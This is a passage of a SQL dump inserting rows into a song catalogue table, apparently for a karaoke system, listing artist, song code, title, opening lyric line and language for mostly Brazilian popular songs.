3437, 'O QUE É QUE A GENTE NÃO FAZ POR AMOR', 'Ela já chega bem cedo...', 'BRA'), (448, 'Gian e Giovani', 3438, 'OLHA AMOR', 'Olha amor Tô morrendo de...', 'BRA'), (449, 'Katinguelê', 3439, 'PEDINDO BIS', 'Meu bem meu coração está...', 'BRA'), (450, 'Ritchie', 3440, 'PELO INTERFONE', 'Chamo por você ninguém atende', 'BRA'), (451, 'Leandro e Leonardo', 3441, 'PENSE EM MIM', 'Em vez de você ficar pensando...', 'BRA'), (452, 'Daniel', 3442, 'POR QUE FUI TE AMAR ASSIM', 'Sei que te perdi dessa vez...', 'BRA'), (453, 'Netinho', 3443, 'PRECISO DE VOCÊ', 'Fui atrás do que restou...', 'BRA'), (454, 'Blitz', 3444, 'QUEM TEM PÕE', 'Eu moro longe não tenho carro', 'BRA'), (455, 'Netinho', 3445, 'RAINHA DO BAILE', 'Quem és tú rainha do baile?', 'BRA'), (456, 'Metrô', 3446, 'SÂNDALO DE DÂNDI', 'Beijo os teus lábios desejo te amar', 'BRA'), (457, 'Dr. Silvana e Cia', 3447, 'SERÃO EXTRA', 'New Iguaçu três e meia da madrugada', 'BRA'), (458, 'Gian e Giovani', 3448, 'TE AMO MENINA', 'Teus olhos menina têm raios...', 'BRA'), (459, 'Leandro e Leonardo', 3449, 'TEMPORAL DE AMOR', 'Chuva no telhado, vento no...', 'BRA'), (460, 'Gian e Giovani', 3450, 'UM DOIS TRÊS', 'De uma cachaça boa não abro...', 'BRA'), (461, 'Daniela Mercury', 3451, 'A PRIMEIRA VISTA', 'Quando não tinha nada eu...', 'BRA'), (462, 'Léo Jaime', 3452, 'A VIDA NÃO PRESTA', 'Você vai de carro pra escola e eu só vou a pé', 'BRA'), (463, 'Nelson Gonçalves', 3453, 'A VOLTA DO BOÊMIO', 'Boemia aqui me tens de...', 'BRA'), (464, 'Balão Mágico (A turma do)', 3454, 'AMIGOS DO PEITO', 'Meu nome é Mike gosto muito de brincar', 'BRA'), (465, 'Chico Buarque', 3455, 'APESAR DE VOCÊ', 'Amanhã vai ser outro dia', 'BRA'), (466, 'Timbalada', 3456, 'BEIJA FLOR', 'Eu fui embora meu amor chorou', 'BRA'), (467, 'Beto Barbosa', 3457, 'BEIJINHO NA BOCA', 'Beijinho na boca gostoso doce mel', 'BRA'), (468, 'Leila Pinheiro', 3458, 'BESAME', 'A orquestra já nos chamou...', 'BRA'), (469, 'Maria Bethânia', 3459, 'BRINCAR DE VIVER', 'Quem me chamou quem vai querer voltar pro', 'BRA'), (470, 'Pirilampo e Saracura', 3460, 'CABECINHA NO OMBRO', 'Encosta tua cabecinha no meu ombro e', 'BRA'), (471, 'Raça Negra', 3461, 'CAROLINE', 'Você veio pra me fazer feliz', 'BRA'), (472, 'Lulu Santos', 3462, 'CASA', 'Primeiro era vertigem como em qualquer', 'BRA'), (473, 'Raça Negra', 3463, 'CIGANA', 'Não deixe o tempo acabar com o nosso', 'BRA'), (474, 'Ultraje a Rigor', 3464, 'CIÚME', 'Oh oh oh oh... Eu quero levar uma vida', 'BRA'), (475, 'Banda Eva', 3465, 'COLEÇÃO', 'Sei que você gosta de brincar de amor', 'BRA'), (476, 'Eliana de Lima', 3466, 'DESEJO DE AMAR', 'Foi sem querer que derramei toda emoção', 'BRA'), (477, 'Negritude Júnior', 3467, 'É DEMAIS', 'Gosto muito de você não...', 'BRA'), (478, 'Jorge Benjor', 3468, 'ENGENHO DE DENTRO', 'Olhaí meu bem prudência e...', 'BRA'), (479, 'Leandro e Leonardo', 3469, 'EU JURO', 'Eu vejo a luz do teu olhar...', 'BRA'), (480, 'Marina Lima', 3470, 'EU NÃO SEI DANÇAR', 'Às vezes eu quero chorar mas o dia nasce', 'BRA'), (481, 'Elis Regina', 3471, 'FASCINAÇÃO', 'Os sonhos mais lindos sonhei', 'BRA'), (482, 'Skank', 3472, 'GAROTA NACIONAL', 'Aqui nesse mundinho fechado', 'BRA'), (483, 'Oswaldo Montenegro', 3473, 'LUA E FLOR', 'Eu amava como amava um cantor', 'BRA'), (484, 'Ultraje a Rigor', 3474, 'MARYLOU', 'Eu tinha uma galinha que se chamava', 'BRA'), (485, 'Sampa Crew', 3475, 'MESMO ASSIM', 'Foram tantas coisas boas', 'BRA'), (486, 'João Paulo e Daniel', 3476, 'MINHA ESTRELA PERDIDA', 'Você vai rir quando eu pedir...', 'BRA'), (487, 'Lulu Santos', 3477, 'MINHA VIDA', 'Quando eu era pequeno eu achava a vida', 'BRA'), (488, 'Kid Abelha', 3478, 'NA RUA, NA CHUVA, NA FAZENDA', 'Não estou disposto a...', 'BRA'), (489, 'Chitãozinho e Xororó', 3479, 'NASCEMOS PRA CANTAR', 'O grande Mestre do céu o nosso criador', 'BRA'), (490, 'Rosana', 3480, 'NEM UM TOQUE', 'Tanta coisa pra dizer e a gente nem se', 'BRA'), (491, 'Daniela Mercury', 3481, 'O MAIS BELO DOS BELOS', 'Quem é que sobe a ladeira do Curuzu?', 'BRA'), (492, 'Raça Negra', 3482, 'O QUE EU FAÇO SEM VOCÊ', 'O que eu faço sem você', 'BRA'), (493, 'Grupo Raça', 3483, 'O TEU CHAMEGO', 'Na vida se promete mais...', 'BRA'), (494, 'Cristina Monteiro', 3484, 'OMBRO AMIGO', 'Você apareceu ferido...', 'BRA'), (495, 'Beto Barbosa', 3485, 'PRETA', 'Preta fala pra mim', 'BRA'), (496, 'Xuxa e José Augusto', 3486, 'QUERER É PODER', 'Eu posso ir onde eu quiser', 'BRA'), (497, 'Katinguelê', 3487, 'RECADO À MINHA AMADA', 'Lua vai iluminar os...', 'BRA'), (498, 'Engenheiros do Hawaí', 3488, 'REFRÃO DE BOLERO', 'Eu que falei "Nem pensar..."', 'BRA'), (499, 'Orquestra da Terra', 3489, 'REI DO GADO', 'Sou desse chão onde o rei...', 'BRA'), (500, 'Wando', 3490, 'SAFADA', 'Eu te quero assim', 'BRA'), (501, 'Raça Negra', 3491, 'SEU AMOR JÁ TERMINOU', 'Seu amor já terminou você já nem liga', 'BRA'), (502, 'Vinícius Cantuária', 3492, 'SÓ VOCÊ', 'Demorei muito pra te encontrar', 'BRA'), (503, 'Beto Guedes', 3493, 'SOL DE PRIMAVERA', 'Quando entrar setembro', 'BRA'), (504, 'Raça Negra', 3494, 'SOZINHO', 'Todo aquele sonho que sonhei', 'BRA'), (505, 'Raça Negra', 3495, 'TE QUERO COMIGO', 'Não dá pra ficar sem você', 'BRA'), (506, 'Maurício Mattar', 3496, 'TEU CAFUNÉ', 'Amor me espere daqui a pouco eu vou', 'BRA'), (507, 'Lulu Santos', 3497, 'TUDO BEM', 'Mas o teu amor me cura', 'BRA'), (508, 'NELSON NED', 3498, 'TUDO PASSARÁ', 'Eu te dei meu amor', 'BRA'), (509, 'Lulu Santos', 3499, 'UM PRO OUTRO', 'Foi bom te ver de novo aqui', 'BRA'), (510, 'Emílio Santiago', 3500, 'VERDADE CHINESA', 'Era só isso que eu queria da vida', 'BRA'), (511, 'Gera Samba', 3501, 'A DANÇA DO BUMBUM', 'Conheci uma menina que veio do sul', 'BRA'), (512, 'Roupa Nova', 3502, 'A FORÇA DO AMOR', 'Abriu minha visão no jeito do amor', 'BRA'), (513, 'Dolores Duran', 3503, 'A NOITE DO MEU BEM', 'Hoje eu quero a rosa mais linda que houver e a', 'BRA'), (514, 'Lulu Santos', 3504, 'ADIVINHE O QUE?', 'Ainda lembro aquela noite', 'BRA'), (515, 'Zé Ramalho', 3505, 'ADMIRÁVEL GADO NOVO', 'Vocês que fazem parte dessa massa', 'BRA'), (516, 'Fafá de Belém', 3506, 'ÁGUAS PASSADAS', 'Eu sempre disse a mim mesma', 'BRA'), (517, 'Erva Doce', 3507, 'AMANTE PROFISSIONAL', 'Moreno alto bonito e sensual', 'BRA'), (518, 'Lulu Santos', 3508, 'AVISO AOS NAVEGANTES', 'Se existe alguém na linha', 'BRA'), (519, 'Rita Lee', 3509, 'BAILA COMIGO', 'Baila comigo', 'BRA'), (520, 'Chitãozinho e Xororó', 3510, 'BAILÃO DE PEÃO', 'É bailão, é rodeio festa de peão', 'BRA'), (521, 'Barão Vermelho', 3511, 'BETE BALANÇO', 'Pode seguir a tua estrela', 'BRA'), (522, 'Cravo e Canela', 3512, 'COISA BOA DEMAIS', 'Ai que coisa boa', 'BRA'), (523, 'Guilherme Arantes', 3513, 'COISAS DO BRASIL', 'Foi tão bom te conhecer...', 'BRA'), (524, 'Roupa Nova', 3514, 'CRISTINA', 'Sua boca na minha', 'BRA'), (525, 'Roupa Nova', 3515, 'DE VOLTA PRO FUTURO', 'Sou o mesmo que te amou', 'BRA'), (526, 'Grupo Tempero', 3516, 'DEIXA EU TE QUERER', 'Bate triste o coração, sem...', 'BRA'), (527, 'Fagner', 3517, 'DESLIZES', 'Não sei por que insisto tanto em te querer', 'BRA'), (528, 'Kid Abelha', 3518, 'DEUS (APAREÇA NA TELEVISÃO)', 'Ah ah ah... Se Ele é Deus e...', 'BRA'), (529, 'Leandro e Leonardo', 3519, 'DOCE MISTÉRIO', 'Eu não sei de onde vem...', 'BRA'), (530, 'Clara Nunes', 3520, 'Ê BAIANA', 'Ê baiana ê ê ê baiana baianinha', 'BRA'), (531, 'Roberta Miranda', 3521, 'EU TE AMO, TE AMO, TE AMO', 'Tanto tempo longe de você', 'BRA'), (532, 'Leandro e Leonardo', 3522, 'FESTA DE RODEIO', 'Em festa de rodeio não dá...', 'BRA'), (533, 'Tiririca', 3523, 'FLORENTINA', 'Essa música eu tava cantando aí', 'BRA'), (534, 'Kid Abelha', 3524, 'GRAND'' HOTEL', 'Se a gente não tivesse feito...', 'BRA'), (535, 'Leci Brandão', 3525, 'ISSO É FUNDO DE QUINTAL', 'O que é isso meu amor...', 'BRA'), (536, 'Paralamas do Sucesso', 3526, 'LANTERNA DOS AFOGADOS', 'Quando tá escuro e ninguém te ouve', 'BRA'), (537, 'Roupa Nova', 3527, 'LINDA DEMAIS', 'Linda só você me fascina', 'BRA'), (538, 'Tim Maia', 3528, 'ME DÊ MOTIVO', 'É engraçado às vezes a gente sente', 'BRA'), (539, 'Flor de Cheiro', 3529, 'MENINO LINDO', 'Menino lindo eu preciso do ...', 'BRA'), (540, 'Só Pra Contrariar', 3530, 'NUNCA MAIS TE MACHUCAR', 'Dói demais saber que eu errei e não poder', 'BRA'), (541, 'Só Pra Contrariar', 3531, 'O AMOR VOCÊ E EU', 'Se olhar nos meus olhos', 'BRA'), (542, 'Paralamas do Sucesso', 3532, 'O BECO', 'No beco escuro explode a violência', 'BRA'), (543, 'Só Pra Contrariar', 3533, 'OUT DOOR', 'Já coloquei num out door e em todos o', 'BRA'), (544, 'Cidade Negra', 3534, 'PENSAMENTO', 'Você precisa saber o que passa aqui', 'BRA'), (545, 'Art Popular', 3535, 'PIMPOLHO', 'Pimpolho é um cara bem legal', 'BRA'), (546, 'Clara Nunes', 3536, 'PORTELA NA AVENIDA', 'Portela eu nunca vi coisa mais bela', 'BRA'), (547, 'Raça Negra', 3537, 'PRECISO TER ALGUÉM', 'De novo a solidão bateu, eu vou chora', 'BRA'), (548, 'Simony', 3538, 'QUANDO TE VI', 'Nem o sol, nem o mar', 'BRA'), (549, 'Zezé Di Camargo e Luciano', 3539, 'SEM MEDO DE SER FELIZ', 'Tira essa paixão da cabeça', 'BRA'), (550, 'Altemar Dutra', 3540, 'SENTIMENTAL DEMAIS', 'Sentimental eu sou ...', 'BRA'), (551, 'Grupo Malícia', 3541, 'SENTINELA', 'Na janela do meu quarto...', 'BRA'), (552, 'Katinguelê', 3542, 'SÓ PEDINDO BIS', 'Não vejo a hora e o momento...', 'BRA'), (553, 'Só Pra Contrariar', 3543, 'TE AMAR SEM MEDO', 'Tá difícil esconder a paixão...', 'BRA'), (554, 'Art Popular', 3544, 'TEMPORAL', 'Faz tempo que a gente não...', 'BRA'), (555, 'Negritude Júnior', 3545, 'TIC-TIC-TAC', 'Bate forte o tambor...', 'BRA'), (556, 'Só Pra Contrariar', 3546, 'TRIBUTO AOS MAMONAS', 'Apesar do pouco tempo que eu fico no', 'BRA'), (557, 'Márcia Freire', 3547, 'VERMELHO', 'A cor do meu batuque', 'BRA'), (558, 'Chitãozinho e Xororó', 3548, 'VEZ EM QUANDO VEM ME VER', 'Não toque em meus cabelos', 'BRA'), (559, 'Antônio Carlos e Jocafi', 3549, 'VOCÊ ABUSOU', 'Você abusou tirou partido de mim abusou', 'BRA'), (560, 'Roupa Nova', 3550, 'VOLTA PRA MIM', 'Amanheci sozinho na cama, um vazio', 'BRA'), (561, 'Chitãozinho e Xororó', 3551, '60 DIAS APAIXONADO', 'Viajando pra Mato Grosso', 'BRA'), (562, 'Gera Samba', 3552, 'A DANÇA DA CORDINHA', 'Passa negão, passa loirinha', 'BRA'), (563, 'Roupa Nova', 3553, 'AMAR É...', 'Amar... é quando não dá mais pra disfar', 'BRA'), (564, 'Marisa Monte', 3554, 'BALANÇA PEMA', 'Don don din... Balança a pema balança sem', 'BRA'), (565, 'Elba Ramalho', 3555, 'BANHO DE CHEIRO', 'Eu quero um banho de cheiro', 'BRA'), (566, 'Sérgio Reis', 3556, 'CAVALO PRETO', 'Tenho um cavalo preto por nome de "Ventania', 'BRA'); INSERT INTO `tb_lista_principal` (`idListaPrincipal`, `interprete`, `codigo`, `titulo`, `inicio`, `idioma`) VALUES (567, 'Sérgio Reis', 3557, 'CHICO MINEIRO', 'Fizemos a última viagem', 'BRA'), (568, 'Zezé Di Camargo e Luciano', 3558, 'COMO UM ANJO', 'Como um anjo você apareceu na minha', 'BRA'), (569, 'Chrystian e Ralf', 3559, 'DESEJO DE AMAR', 'Pele macia, toda morena Esse seu corpo', 'BRA'), (570, 'Martinho da Vila', 3560, 'DEVAGAR, DEVAGARINHO', 'É devagar, é devagar', 'BRA'), (571, 'Cidade Negra', 3561, 'DOUTOR', 'Ó doutor, tem que me ajudar', 'BRA'), (572, 'Cidade Negra', 3562, 'DOWNTOWN', 'Eu fui eu fui... Pro outro lado de lá', 'BRA'), (573, 'Akundum', 3563, 'EMACONHADA', 'Kaya erva danada... É reggae sim se é reggae', 'BRA'), (574, 'Chitãozinho e Xororó', 3564, 'FEITO EU', 'Caminhando sem saber pra onde,', 'BRA'), (575, 'Carrapicho', 3565, 'FESTA DE UM POVO', 'Ôh ôh ôh... lê lê lê... Boi garantido chegou', 'BRA'), (576, 'Zezé Di Camargo e Luciano', 3566, 'FOI A PRIMEIRA VEZ', 'Foi a primeira vez a mais forte talvez', 'BRA'), (577, 'Exaltasamba', 3567, 'GAMEI', 'Quando eu vi, me amarrei', 'BRA'), (578, 'Zezé Di Camargo e Luciano', 3568, 'INDIFERENÇA', 'Fala pra mim, diz a verdade', 'BRA'), (579, 'Legião Urbana', 3569, 'ÍNDIOS', 'Quem me dera ao menos...', 'BRA'), (580, 'Biro do Cavaco', 3570, 'JÉSSICA', 'Sem a gente esperar nasce uma', 'BRA'), (581, 'Paralamas do Sucesso', 3571, 'LA BELLA LUNA', 'Por mais que eu pense,', 'BRA'), (582, 'Laura Pausini', 3572, 'LA SOLITUDINE', 'Marco se n''e andato e non...', 'ITA'), (583, 'Chitãozinho e Xororó', 3573, 'LOIRA GELADA', 'Hoje eu vou cair no mundo', 'BRA'), (584, 'Ricky Martin', 3574, 'MARIA', 'Un, dos, tres...', 'ESP'), (585, 'Xuxa', 3575, 'MARQUEI UM "X"', 'Marquei um "X" Um "X"', 'BRA'), (586, 'Companhia do Pagode', 3576, 'MELÔ DO STRIP TEASE', 'Eu lhe disse que não bulisse', 'BRA'), (587, 'Netinho', 3577, 'MENINA LINDA', 'Óh menina linda tão bela', 'BRA'), (588, 'Gal Costa', 3578, 'MEU BEM, MEU MAL', 'Você é meu caminho, meu...', 'BRA'), (589, 'Royce do Cavaco', 3579, 'MEU CORAÇÃO É TEU', 'Infelizmente nós somos assim', 'BRA'), (590, 'Roberto Carlos', 3580, 'MULHER DE 40', 'Sorriso bonito olhar de quem sabe', 'BRA'), (591, 'Zezé Di Camargo e Luciano', 3581, 'NA HORA "H"', 'Eu preciso te dizer que ainda te que', 'BRA'), (592, 'Art Popular', 3582, 'NANI', 'Quantas vezes Nani tantas vezes Nani', 'BRA'), (593, 'Daniela Mercury', 3583, 'NOBRE VAGABUNDO', 'Quanto tempo tenho pra matar essa sau', 'BRA'), (594, 'Milton Nascimento', 3584, 'NOS BAILES DA VIDA', 'Foi nos bailes da vida ou num bar', 'BRA'), (595, 'Zélia Duncan', 3585, 'NOS LENÇÓIS DESSE REGGAE', 'Flash de viagem vontade de dançar um', 'BRA'), (596, 'Ara Ketu', 3586, 'NOSSA GUERRA SANTA', 'Esse nosso amor é uma loucura', 'BRA'), (597, 'Gal Costa-Gilberto Gil', 3587, 'ODARA', 'Deixa eu dançar pro meu...', 'BRA'), (598, 'Chitãozinho e Xororó', 3588, 'PÁGINA DE AMIGOS', 'Ela ligou terminando tudo entre eu e', 'BRA'), (599, 'Sérgio Reis', 3589, 'PANELA VELHA', 'Tô de namoro com uma moça solteirona', 'BRA'), (600, 'Zezé Di Camargo e Luciano', 3590, 'POR AMOR TE DEIXO IR', 'Pode ir, não impeço sua viagem', 'BRA'), (601, 'Zezé Di Camargo e Luciano', 3591, 'PRECISO SER AMADO', 'Não preciso de amor eu preciso é ser', 'BRA'), (602, 'Grupo Raça', 3592, 'PURA EMOÇÃO', 'É frio sem você, meu amor...', 'BRA'), (603, 'Sérgio Reis', 3593, 'SAUDADE DA MINHA TERRA', 'De que me adianta viver na cidade', 'BRA'), (604, 'Sandra de Sá', 3594, 'SOZINHA', 'Às vezes no silêncio da noite', 'BRA'), (605, 'Skank', 3595, 'TÃO SEU', 'Sinto sua falta, não posso esperar', 'BRA'), (606, 'Legião Urbana', 3596, 'O TEATRO DOS VAMPIROS', 'Sempre precisei de um pouco...', 'BRA'), (607, 'Roberto Carlos', 3597, 'TEM COISAS QUE A GENTE NÃO TIRA DO CORAÇÃO', 'Que bom te encontrar', 'BRA'), (608, 'Art Popular', 3598, 'TRAPAÇA', 'Quando você passa tento te dizer', 'BRA'), (609, 'Banda Cheiro de Amor', 3599, 'VAI SACUDIR, VAI ABALAR', 'Vai sacudir vai abalar explode coração', 'BRA'), (610, 'Gilberto Gil', 3600, 'VAMOS FUGIR', 'Vamos fugir desse lugar, baby...', 'BRA'), (611, 'Carlinhos Brown', 3601, 'A NAMORADA', 'Ei bicho o broto do seu lado', 'BRA'), (612, 'Paralamas do Sucesso', 3602, 'A NOVIDADE', 'A novidade veio dar à praia', 'BRA'), (613, 'Legião Urbana', 3603, 'A VIA LÁCTEA', 'Quando tudo está perdido...', 'BRA'), (614, 'Só Pra Contrariar', 3604, 'AMOR VERDADEIRO', 'Olhe dentro de mim, você pode se ver', 'BRA'), (615, 'Virgulóides', 3605, 'BAGULHO NO BUMBA', 'Nessa "bumba" eu não ando mais', 'BRA'), (616, 'Marisa Monte', 3606, 'BEIJA EU', 'Seja eu, seja eu deixa que eu seja eu', 'BRA'), (617, 'Banda Eva', 3607, 'BELEZA RARA', 'Eu não posso deixar que o tempo', 'BRA'), (618, 'Cidade Negra', 3608, 'CASA', 'É seu único lugar no mundo', 'BRA'), (619, 'Elba Ramalho', 3609, 'CHÃO DE GIZ', 'Desço dessa solidão', 'BRA'), (620, 'Rita Lee', 3610, 'COISAS DA VIDA', 'Quando a lua apareceu', 'BRA'), (621, 'Elis Regina', 3611, 'COMO NOSSOS PAIS', 'Não quero lhe falar meu grande amor', 'BRA'), (622, 'Marisa Monte', 3612, 'DANÇA DA SOLIDÃO', 'Solidão é lava que cobre tudo', 'BRA'), (623, 'Lulu Santos', 3613, 'DANCIN'' DAYS', 'Abra suas asas solte suas feras', 'BRA'), (624, 'Legião Urbana', 3614, 'DEZESSEIS', 'João Roberto era o maioral...', 'BRA'), (625, 'Leandro e Leonardo', 3615, 'DIZ PRA MIM', 'Diz pra mim que fazer pra te...', 'BRA'), (626, 'Fábio Jr.', 3616, 'ENTREGA', 'Você foi chegando de mansinho', 'BRA'), (627, 'Marisa Monte', 3617, 'ESTA MELODIA', 'Quando vem rompendo o dia', 'BRA'), (628, 'Skank', 3618, 'EU DISSE A ELA', 'Quando eu disse a ela que o amor', 'BRA'), (629, 'Cidade Negra', 3619, 'FIRMAMENTO', 'O que é que eu vou fazer agora', 'BRA'), (630, 'Lulu Santos', 3620, 'GRAAL', 'É necessário descobrir', 'BRA'), (631, 'Exaltasamba', 3621, 'LOUCA PAIXÃO', 'Vem a noite e eu tão só doidinho pra', 'BRA'), (632, 'Exaltasamba', 3622, 'LUZ DO DESEJO', 'Apague a luz, deita ao meu ...', 'BRA'), (633, 'Cássia Eller', 3623, 'MALANDRAGEM', 'Quem sabe eu ainda sou uma garotinha', 'BRA'), (634, 'Chico César', 3624, 'MAMA ÁFRICA', 'Let me sing let me sing all love', 'BRA'), (635, 'Grupo Cafuné', 3625, 'MELÔ DO PIRULITO', 'Olha o piu piu ôh... pirulito...', 'BRA'), (636, 'Netinho', 3626, 'MILLA', 'Oh Milla mil e uma noites de amor com', 'BRA'), (637, 'Cidade Negra', 3627, 'MUCAMA', 'Ô ô ô... O que se espera de uma nação', 'BRA'), (638, 'Maurício Mattar', 3628, 'MUITO ROMÂNTICO', 'Eu tenho andado tão calado', 'BRA'), (639, 'Marisa Monte', 3629, 'NA ESTRADA', 'Thu ru ru... Ela vai voltar vai chegar e se', 'BRA'), (640, 'Roupa Nova', 3630, 'NOSSA HISTÓRIA', 'Hoje eu venho outra vez meu lugar é', 'BRA'), (641, 'Skank', 3631, 'O HOMEM QUE SABIA DEMAIS', 'Sabia? Sim sabia mais e mais e mais', 'BRA'), (642, 'Sérgio Reis', 3632, 'O MENINO DA PORTEIRA', 'Toda vez que eu viajava', 'BRA'), (643, 'Leandro e Leonardo', 3633, 'POR CAUSA DELA', 'Por causa dela eu perdi o...', 'BRA'), (644, 'Raça Negra', 3634, 'PRECISO DESSE AMOR', 'À noite no meu quarto, solidão', 'BRA'), (645, 'Daniela Mercury', 3635, 'RAPUNZEL', 'Love as suas transas de mel', 'BRA'), (646, 'Maurício Mattar', 3636, 'RUMOS DO CORAÇÃO', 'Ah! se eu pudesse ao menos sair de', 'BRA'), (647, 'Molejo', 3637, 'SAMBA DIFERENTE', 'Quem samba com molejo samba diferente', 'BRA'), (648, 'Royce do Cavaco', 3638, 'SÓ VOCÊ', 'Quando a luz se apaga', 'BRA'), (649, 'Renato Russo', 3639, 'STRANI AMORI', 'Mi dispiace deve andare via', 'ITA'), (650, 'Negritude Júnior', 3640, 'TANAJURA', 'Tana... tanajura jura que me ama', 'BRA'), (651, 'Exaltasamba', 3641, 'TELEGRAMA', 'Ah, que saudade de você estou a te', 'BRA'), (652, 'Lulu Santos', 3642, 'TUDO IGUAL', 'Então é assim que a vida faz', 'BRA'), (653, 'Legião Urbana', 3643, 'VENTO NO LITORAL', 'De tarde quero descansar...', 'BRA'), (654, 'Zeca Pagodinho', 3644, 'VERDADE', 'Descobri que te amo demais', 'BRA'), (655, 'Chrystian e Ralf', 3645, 'VIRA VIROU', 'Por causa de você', 'BRA'), (656, 'Lobão', 3646, 'A QUEDA', 'Quantos sonhos e sonhos acordo', 'BRA'), (657, 'Legião Urbana', 3647, 'ANGRA DOS REIS', 'Deixa, se fosse sempre assim...', 'BRA'), (658, 'Exaltasamba', 3648, 'ARMADILHA', 'Dessa vez te peguei de jeito', 'BRA'), (659, 'Tim Maia', 3649, 'AZUL DA COR DO MAR', 'Ah, se o mundo inteiro me pudesse ouvir', 'BRA'), (660, 'Beto Barbosa', 3650, 'BALANÇA O BUMBUM MUCHACHA', 'Quando eu te vejo bate meu...', 'BRA'), (661, 'Sérgio Murilo', 3651, 'BROTO LEGAL', 'Oh, oh, que broto legal garota fenomenal', 'BRA'), (662, 'Raul Seixas', 3652, 'CAPIM GUINÉ', 'Plantei um sítio no sertão de Piritiba', 'BRA'), (663, 'Toquinho-Vinicius de Moraes', 3653, 'CARTA AO TOM 74', 'Rua Nascimento Silva cento e sete', 'BRA'), (664, 'Kid Abelha', 3654, 'COMO É QUE EU VOU EMBORA', 'Ah ah ah... O que é que eu...', 'BRA'), (665, 'Chitãozinho e Xororó', 3655, 'CONFIDÊNCIAS', 'Abra os olhos do seu coração', 'BRA'), (666, 'Claudinho e Buchecha', 3656, 'CONQUISTA', 'Sabe, tchú ru ru ru...', 'BRA'), (667, 'Banda Cheiro de Amor', 3657, 'É DEMAIS MEU REI', 'Vou dar a volta pelo globo terrestre', 'BRA'), (668, 'Skank', 3658, 'É PROIBIDO FUMAR', 'É proibido fumar diz o aviso que eu', 'BRA'), (669, 'Skank', 3659, 'É UMA PARTIDA DE FUTEBOL', 'Ô Bola na trave não altera o placar', 'BRA'), (670, 'Exaltasamba', 3660, 'É VOCÊ', 'É você meu desejo mais', 'BRA'), (671, 'Cássia Eller', 3661, 'E.C.T.', 'Tava com cara que carimba postais', 'BRA'), (672, 'Shakira', 3662, 'ESTOY AQUI', 'Ya sé que no vedrás todo lo que fué', 'ESP'), (673, 'Leandro e Leonardo', 3663, 'EU SOU DESEJO, VOCÊ É PAIXÃO', 'Você me amou e eu te amei...', 'BRA'), (674, 'Cidade Negra', 3664, 'FALAR A VERDADE', 'Vamos falar a verdade pra vocês!', 'BRA'), (675, 'Nino Rosso', 3665, 'IO CHE NON VIVO SENZA TE', 'Siamo qui noi soli come ogni sera', 'ITA'), (676, 'Tim Maia', 3666, 'LEVA', 'Foi bom eu ficar com você o ano inteiro', 'BRA'), (677, 'Paralamas do Sucesso', 3667, 'LOURINHA BOMBRIL', 'Para e repara, olha como ela samba', 'BRA'), (678, 'Caetano Veloso', 3668, 'LUA DE SÃO JORGE', 'Lua de São Jorge, lua deslumbrante', 'BRA'), (679, 'Katinguelê', 3669, 'LUANA', 'Eu vendo você na tristeza...', 'BRA'), (680, 'Cidade Negra', 3670, 'LUTA DE CLASSES', 'Tudo o que eu posso ver', 'BRA'), (681, 'Marina Lima', 3671, 'MESMO QUE SEJA EU', 'Sei que você fez os seus castelos', 'BRA'), (682, 'Cidade Negra', 3672, 'MINHA IRMÃ', 'Ôh, isso é que me faz sorrir', 'BRA'), (683, 'Gian e Giovani', 3673, 'NÃO VIVO SEM VOCÊ', 'Todo dia é a mesma coisa já...', 'BRA'), (684, 'Rita Lee', 3674, 'NEM LUXO NEM LIXO', 'Como vai você? Assim como eu', 'BRA'), (685, 'Fred Bongusto', 3675, 'O SOLE MIO', 'Che bella cosa ''na iurna ta''e sole', 'ITA'), (686, 'Mastruz Com Leite', 3676, 'OLHA PRO CÉU', 'Olha pro céu meu amor vê como ele está', 'BRA'), (687, 'Chitãozinho e Xororó', 3677, 'PALAVRAS (WORDS)', 'Smile, an everlasting smile', 'BRA'), (688, 'Chitãozinho e Xororó', 3678, 'PODE SER PRA VALER', 'Se você está aí sozinha em plena', 'BRA'), (689, 'Titãs', 3679, 'POLÍCIA', 'Dizem que ela existe pra ajudar dizem que', 'BRA'), (690, 'Tim Maia', 3680, 'PRIMAVERA (VERSÃO AO VIVO)', 'Quando o inverno chegar', 'BRA'), (691, 'Peppino Di Capri', 3681, 'ROBERTA', 'Lo sai non e vero che non ti voglio pi', 'ITA'), (692, 'Gino Paoli', 3682, 'SAPORE DI SALE', 'Sapore di sale sapore di mare...', 'ITA'), (693, 'João Mineiro e Marciano', 3683, 'SEU AMOR AINDA É TUDO', 'Muito prazer em revê-la você...', 'BRA'), (694, 'Exaltasamba', 3684, 'SINCERA', 'Mais que amiga foi um xodó', 'BRA'), (695, 'Chitãozinho e Xororó', 3685, 'SÓ QUEM AMOU DEMAIS', 'Se já doeu demais a falta desse amor', 'BRA'), (696, 'Kid Abelha', 3686, 'TE AMO PRA SEMPRE', 'Na na na...pra conservar o amor...', 'BRA'), (697, 'Raul Seixas', 3687, 'TREM DAS 7', 'Ói, ói o trem vem surgindo de trás das', 'BRA'), (698, 'Paralamas do Sucesso', 3688, 'VOCÊ', 'Você é algo assim é tudo pra mim', 'BRA'), (699, 'Mastruz Com Leite', 3689, 'VOU TE MATAR DE CHEIRO', 'Tô doidinha pra me deitar naquela cama', 'BRA'), (700, 'Bobby Solo', 3690, 'ZÍNGARA', 'Prendi questa mano zíngara', 'ITA'), (701, 'É o Tchan', 3691, 'A LOURINHA', 'Sei que a lourinha geladinha', 'BRA'), (702, 'Fafá de Belém', 3692, 'ABANDONADA', 'Abandonada por você ...', 'BRA'), (703, 'Negritude Júnior', 3693, 'ABSOLUTA', 'Não seja deselegante...', 'BRA'), (704, 'Pirilampo e Saracura', 3694, 'BOIADEIRO ERRANTE', 'Eu venho vindo de uma querência distante', 'BRA'), (705, 'Yahoo', 3695, 'CAMINHOS DO SOL', 'Sem você a vida pode parecer', 'BRA'), (706, 'Fagner', 3696, 'CANTEIROS', 'Quando penso em você', 'BRA'), (707, 'Nelson Gonçalves', 3697, 'CARINHOSO', 'Meu coração não sei por que', 'BRA'), (708, 'Benito Di Paula', 3698, 'CHARLIE BROWN', 'Eh meu amigo Charlie', 'BRA'), (709, 'Kid Abelha', 3699, 'COMO EU QUERO', 'Diz pra eu ficar muda faz...', 'BRA'), (710, 'Roberto Carlos', 3700, 'COMO VAI VOCÊ?', 'Como vai você?', 'BRA'), (711, 'Rita Pavone', 3701, 'DATEMI UN MARTELO (REMIX)', 'Tiú rú tiú rá... Datemi un martelo che cosa ne', 'ITA'), (712, 'É o Tchan', 3702, 'DENGO DE MULHERES', 'Toda moça tem um dengo', 'BRA'), (713, 'Jerry Adriani', 3703, 'DIANA', 'Não te esqueças meu amor...', 'BRA'), (714, 'Chitãozinho e Xororó', 3704, 'É ASSIM QUE TE AMO', 'Sem me pedir você chegou assim', 'BRA'), (715, 